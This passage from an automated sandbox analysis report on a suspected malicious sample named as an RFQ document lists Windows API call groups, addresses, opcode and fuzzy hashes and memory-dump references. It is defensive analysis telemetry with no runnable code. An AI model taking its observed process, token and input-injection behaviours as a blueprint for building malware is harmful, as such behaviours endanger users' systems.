                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                • String ID:
                                                                                • API String ID: 3311875123-0
                                                                                • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                                                                                • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                                                                                APIs
                                                                                  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
                                                                                • GetWindowRect.USER32(?,?), ref: 004017FE
                                                                                • ScreenToClient.USER32(?,?), ref: 0040181B
                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
                                                                                • EndPaint.USER32(?,?), ref: 00401876
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                • String ID:
                                                                                • API String ID: 1827037458-0
                                                                                • Opcode ID: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                                                                                • Instruction ID: 802354e609c34c5ad38a523f12b28351d49e30531d5e0f2791b792dab913329b
                                                                                • Opcode Fuzzy Hash: d9366b8442643d94811bf82364bc44e8890a7fb11cafe672375ae29e37d5b646
                                                                                • Instruction Fuzzy Hash: AF418E31100700AFD710EF25C884FAA7BE8EB49724F044A3EFA94962F1C734A945DB6A
                                                                                APIs
                                                                                • ShowWindow.USER32(004C57B0,00000000,00C11C90,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 0048B736
                                                                                • ShowWindow.USER32(004C57B0,00000000,00C11C90,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
                                                                                • ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
                                                                                • EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
                                                                                • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 642888154-0
                                                                                • Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                                                • Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
                                                                                • Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                                                • Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                                                                  • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                                                                • GetDesktopWindow.USER32 ref: 004770D6
                                                                                • GetWindowRect.USER32(00000000), ref: 004770DD
                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                                                                  • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                • GetCursorPos.USER32(?), ref: 0047713B
                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                • String ID:
                                                                                • API String ID: 4137160315-0
                                                                                • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                                                                                • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                                                                                APIs
                                                                                  • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                  • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                  • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                  • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                  • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                                                                • HeapFree.KERNEL32(00000000), ref: 00458911
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                • String ID:
                                                                                • API String ID: 3008561057-0
                                                                                • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                                                                • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                                                                • CloseHandle.KERNEL32(00000004), ref: 00458603
                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                • String ID:
                                                                                • API String ID: 1413079979-0
                                                                                • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                                                                                • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0045B7B5
                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0045B7C6
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045B7CD
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0045B7D5
                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0045B7EC
                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0045B7FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDevice$Release
                                                                                • String ID:
                                                                                • API String ID: 1035833867-0
                                                                                • Opcode ID: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                                                                                • Instruction ID: ebab011a078b8c66a555392ea924b50fda774449f62ca66a232c327e230173f3
                                                                                • Opcode Fuzzy Hash: e8a4a266755e065bcf82882bab04b7313908cea5161a3f7747e2bdf77f2db466
                                                                                • Instruction Fuzzy Hash: ED018475E00209BBEF109BE69C49A5EBFB8EB48711F00407AFE04A7291D6309C14CF94
                                                                                APIs
                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                • Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                • Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
                                                                                • Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
                                                                                • Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 839392675-0
                                                                                • Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                • Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
                                                                                • Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
                                                                                • Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 00467243
                                                                                • EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
                                                                                • TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
                                                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E
                                                                                  • Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
                                                                                • LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3495660284-0
                                                                                • Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                                • Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
                                                                                • Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
                                                                                • Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
                                                                                • UnloadUserProfile.USERENV(?,?), ref: 004589A9
                                                                                • CloseHandle.KERNEL32(?), ref: 004589B2
                                                                                • CloseHandle.KERNEL32(?), ref: 004589BA
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
                                                                                • HeapFree.KERNEL32(00000000), ref: 004589CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                • Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                                • Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
                                                                                • Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
                                                                                • Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58
                                                                                APIs
                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
                                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
                                                                                • CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
                                                                                • _memcmp.LIBCMT ref: 00457748
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                • String ID: ,,I
                                                                                • API String ID: 314563124-4163367948
                                                                                • Opcode ID: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                                                • Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
                                                                                • Opcode Fuzzy Hash: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
                                                                                • Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 00478613
                                                                                • CharUpperBuffW.USER32(?,?), ref: 00478722
                                                                                • VariantClear.OLEAUT32(?), ref: 0047889A
                                                                                  • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
                                                                                  • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
                                                                                  • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                • API String ID: 4237274167-1221869570
                                                                                • Opcode ID: 30fbddf7d199dad1f85b775506dcd4a0a024978ed7230d1fa202dd3a40196eec
                                                                                • Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
                                                                                • Opcode Fuzzy Hash: 30fbddf7d199dad1f85b775506dcd4a0a024978ed7230d1fa202dd3a40196eec
                                                                                • Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56
                                                                                APIs
                                                                                  • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                • _memset.LIBCMT ref: 00462B87
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
